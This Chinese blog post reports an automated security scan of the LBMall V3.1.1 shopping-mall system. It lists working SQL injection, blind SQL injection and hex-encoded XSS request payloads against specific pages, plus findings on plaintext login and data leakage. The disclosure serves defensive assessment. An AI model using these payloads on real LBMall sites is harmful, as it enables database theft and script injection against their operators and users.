paip lbmall V3 1 1 乐彼多用户商城系统的安全漏洞总结

于 2019-02-18 21:39:25 发布
阅读量239 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sdfhncfw/article/details/87648310
本文详细分析了乐彼多用户商城系统V3.1.1的安全漏洞,包括32条高危SQL注入、XSS跨站点脚本攻击等,揭示了明文传输密码、敏感信息泄露等问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

               

paip. lbmall V3.1.1  乐彼多用户商城系统的安全漏洞总结

作者Attilax , 1466519819@qq.com
因为我的网站中账户模块是用LBMALL V3.1.1实现的..今天特意扫描了下它的安全漏洞,用的是HPWI9。。

结果发现了 32条高危漏洞

SQL注入(7个漏洞):
---------------------

Critical SQL 盲注(已确认) GET http://localhost/News/List.aspx (Query) tid=0&title=12345'%09OR%09(select%09Ascii(substring(db_name(dbid)%2c2%2c1))%09from%09master..sysprocesses%09where%09spid%3d%40%40SPID)%3c128%09OR%09'4'%3d'0
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) keyword=12345&bprice=12345&eprice=12345%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&typeid=&id=1
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) keyword=12345'%09and%09(select%09count(*)%09from%09spitable)%3d1%09or%09'1'%3d'0%09&bprice=12345&eprice=12345&typeid=&id=1
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) typeid=0%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&id=1

 

XSS 跨站点脚本(7个漏洞):
---------------------
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&dateTo=12345&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345&dateTo=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=1%2c&top=&rec=&arg=&check_=1&hidden_id0=1&txt_title0=titttttt...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&rec=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%2a%2f%70%52%65%53%73%49%6f%4e%28%61%6c%65%72%74%28%36%34%31%33%34%29%29%20%2...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?%22%20%6f%4e%66%4f%63%55%73%3d%61%6c%65%72%74%28%37%33%35%31%33%29%2...
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?%22%20%6f%4e%66%4f%63%55%73%3d%4d%73%67%42%6f%78%28%35%36%31%32%36%29%20%22&hidden_id2=3&txt_...


明文传输密码漏洞以及登录窗体敏感漏洞(5条)
--------------------------------------------------
High 通过未加密的连接发送登录信息  GET http://localhost/admin/Login.aspx
High 通过未加密的连接发送登录信息  GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
High 通过未加密的连接发送登录信息  GET http://localhost/Login.aspx
High 未加密的登录窗体  GET http://localhost/admin/Login.aspx
High 未加密的登录窗体  GET http://localhost/Login.aspx (Query) uu=user/Default.aspx


敏感信息泄露URL/COOKIE/POST (13条)
---------------------------------
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=20&page=1
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) stime=12345&etime=12345&unames=12345&page=1
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=26&=25&=24&=23&=22&=21&=20&=19&=18&=1...
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=25&=24&=23&=22&=21&=20&=19&=18&=17&=1...
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda&page=2
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=12345&letime=12345&letime2=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/Userlist.aspx (Query) usernames= (Post) __VIEWSTATE=%2fwEPDwUKLTc1MDEzNTU0N2Rki2tGFykf2v4TZF1Ik3esdjZtfhY%3d&txt_starttime=12345&txt_endtime=12345&txt_search=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx
Low “Admin”目录  GET http://localhost/admin/
 

 

 

           

再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.youkuaiyun.com/jiangjunshow

sdfhncfw
关注
PAIP WEB程序网站安全扫描检测工具(桌面程序)总结
sdfhncfw的博客
11-13 500
PAIP WEB程序网站安全扫描检测工具(桌面程序)总结
paip 提升用户体验---c++ qt自定义窗体 1 ---标题栏的绘制
sdfhncfw的博客
02-15 187
paip 提升用户体验---c++ qt自定义窗体 1 ---标题栏的绘制
paip. lbmall V3.1.1 多用户商城系统安全漏洞总结
attilax的专栏
09-23 3752
paip. lbmall V3.1.1  多用户商城系统安全漏洞总结 作者Attilax , 1466519819@qq.com 因为我的网站中账户模块是用LBMALL V3.1.1实现的..今天特意扫描了下它的安全漏洞,用的是HPWI9。。 结果发现了 32条高危漏洞 SQL注入(7个漏洞): --------------------- Critical SQL 盲注(已确认)
paip.lbmall 安装doc
attilax的专栏
08-29 2259
paip.lbmall  安装doc 非开源ASP.NET系统 下载 http://www.lbmall.cn/ 版本 Version 3.1.0 ASP.NET 4.0 SQL2005/2008 功能说明 LBMall 多用户商城系统 功能说明 安装 http://localhost:90/install/ 在DB中建立LBMALL库,设定DB连接 设定ADM
paip 最新的c++ qt5 1 1环境搭建跟hello world
sdfhncfw的博客
11-18 198
paip 最新的c++ qt5 1 1环境搭建跟hello world
paip.提升用户体验与安全性---注册流程总结
attilax的专栏
09-08 2287
paip.提升用户体验与安全性---注册流程总结     限制用户输入国内TOP100的口令... 1 限制用户输入国外TOP500的口令黑名单... 1 限制输入常用字典黑名单口令... 1 口令长度7---20位... 1 口令为纯小写字母,长度应为12位及以上... 2 口令为纯数字式,长度应为17位及以上... 2 增加口令强度检测UI器(弱,中,强三档)2
paip 提升安全 网站登录密码明文传输的登录高危漏洞解决方案
sdfhncfw的博客
11-05 502
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.youkuaiyun.com/jiangjunshow也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!                paip.提升安全--
paip python优缺点attilax总结
sdfhncfw的博客
11-11 327
paip python优缺点attilax总结
1. paip.discuz X2.5 积分(金钱)功能API总结
attilax的专栏
07-16 2772
1paip.discuz  X2.5积分(金钱)功能API总结 2. /source/function/function_core.php   updatemembercount() 金钱积分增删....带日志纪录.. 示列: 进行返奖操作,给账户增加金钱,并进行日志纪录..  $uname=$_REQUEST["uname"];  $minus=$_REQUEST["mon
paip 提升安全---网站登录密码明文传输的登录高危漏洞解决方案
jffyuhgv的博客
02-11 1404
paip 提升安全---网站登录密码明文传输的登录高危漏洞解决方案
PAIP-开源
05-01
PAIP(管道)是通用过滤器应用程序。 它使用插件来传输和转换数据。 它们可以嵌套,因此内部结构可能会变得非常复杂(非线性)。 命令行界面类似于编程语言,非常简单。
paip
03-12
### PAIP编程珠玑中的示例代码解释 PAIP(Paradigms of Artificial Intelligence Programming)是一本深入探讨人工智能编程范式的书籍,其中包含了大量 Lisp 编写的程序实例。这些例子不仅展示了如何实现特定的人工...
基于Matlab的500kV LCC-HVDC直流输电仿真模型及其十二脉波晶闸管换流阀控制策略
08-23
在Matlab中构建500kV LCC-HVDC直流输电仿真模型的方法和技术细节。该模型采用了十二脉波晶闸管换流阀,并分别在整流侧和逆变侧应用了直流电流PI控制和直流电压PI控制策略。通过仿真实验,验证了该模型的有效性,实现了2500A直流电流和500kV直流电压的稳定输出,同时获得了高质量的多脉波波形。文章还简要概述了Matlab代码的实现步骤,强调了PI控制器在电力电子系统中的重要作用。 适合人群:从事电力系统仿真、直流输电技术研发的专业人士,以及对电力电子控制系统感兴趣的科研人员。 使用场景及目标:适用于需要理解和掌握高压直流输电系统建模方法的研究人员和技术人员,旨在帮助他们更好地理解LCC-HVDC技术的工作原理和控制策略。 其他说明:文中提到的具体代码实现未完全展示,但提供了详细的实现思路和关键点,有助于读者自行实现或改进相关模型。
sunny121li-DeepNLPLib-30076-1755347980442.zip
08-23
cursorsun
规则引擎core,包括规则对象,执行器,执行容器,逻辑元模型
08-23
规则引擎系列文章
基于GB28181-2016标准实现的网络视频平台,用 Go 语言实现,实现了 SIP 协议和信令服务器。.zip
最新发布
08-23
基于GB28181-2016标准实现的网络视频平台,用 Go 语言实现,实现了 SIP 协议和信令服务器。.zip
虚拟电厂微网中碳捕集电厂综合能源系统的多时间尺度低碳经济调度MATLAB建模与实现 - 多时间尺度调度 v1.5
08-23
基于MATLAB实现的虚拟电厂微网中碳捕集电厂综合能源系统的多时间尺度低碳经济调度模型。首先,在源侧引入了碳捕集电厂的解决方案,通过增加烟气旁路系统和溶液存储器来提升灵活性,并与风电进行协调配合。其次,在负荷侧利用价格型和激励型两种需求响应机制,分别针对日前和实时调度进行优化配置。最后,构建了一个日前-日内两阶段的低碳经济调度模型,实现了对系统负荷及分配计划的有效优化。文中还提供了具体的MATLAB代码片段以及遇到的问题解决办法,如碳捕集动态约束导致的整数变量爆炸和热负荷波动引起的CHP机组反复启停等问题。 适用人群:从事电力系统研究、智能电网开发的技术人员,尤其是关注低碳技术和MATLAB仿真的研究人员。 使用场景及目标:适用于需要理解和应用多时间尺度调度模型的研究项目,旨在降低碳排放并提高清洁能源利用率的同时保持较低的需求响应成本。 其他说明:该模型不仅考虑了经济效益,还特别强调了环境效益,即减少碳排放。同时,文中提到的一些具体参数(如碳价系数)是经过多次实验得出的最佳值,对于实际工程应用具有重要指导意义。此外,作者还提出了未来可能的研究方向,例如将溶液存储器改为氢储能等创新思路。
AI 和数据科学职位数据集(14列,735条记录)CSV+JSON
08-23
探索 2025 年从实时职位中收集的 700+ 个 AI 和数据科学职位。 positionName 职位名称(例如,数据科学家、人工智能实习生) company 提供工作的公司 rating 雇主评级(如果有) location 工作地点(例如班加罗尔、偏远地区) description 从职位页面抓取的原始职位描述文本 salary 预计工资范围(如果有) jobType 全职、实习、兼职、远程等。 postedAt 投寄日期或相对投寄时间(例如「3天前」) externalApplyLink 对外申请的直接链接 searchInput 抓取过程中使用的元数据(例如,职位:数据科学家,国家/地区:印度)
COMSOL纳米圆柱多极散射分析 Mie理论 v1.2
08-23
利用COMSOL进行纳米圆柱多极散射仿真的方法及其后续数据处理流程。首先解释了纳米圆柱多极散射的概念,即当光线照射到纳米圆柱时发生的散射现象,并指出COMSOL软件能够很好地完成这一过程的建模与仿真。接着,作者分享了如何借助Python(主要使用numpy和matplotlib库)对从COMSOL导出的数据进行处理和可视化的具体步骤,包括单次实验数据的绘图展示以及针对不同波长情况下的对比分析。此外,还探讨了通过傅里叶变换计算多极展开系数的方法,进一步加深了对散射机制的理解。最后提及了经典Mie理论作为参考。 适合人群:对光学、材料科学感兴趣的科研工作者和技术爱好者,尤其是那些希望掌握COMSOL仿真工具并能运用Python进行数据分析的人士。 使用场景及目标:适用于从事纳米光学研究的科学家们,在进行相关实验前预估结果或者验证已有结论;也可以帮助学生更好地理解光与物质之间的相互作用原理。同时,对于想要提升自己编程技能的人来说,也是一个很好的案例学习。 其他说明:文中提供的Python脚本仅为示例,实际操作时可根据具体情况调整参数设置。另外,关于多极散射的具体理论部分并未做过多阐述,有兴趣深入了解的朋友可以查阅更多专业文献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值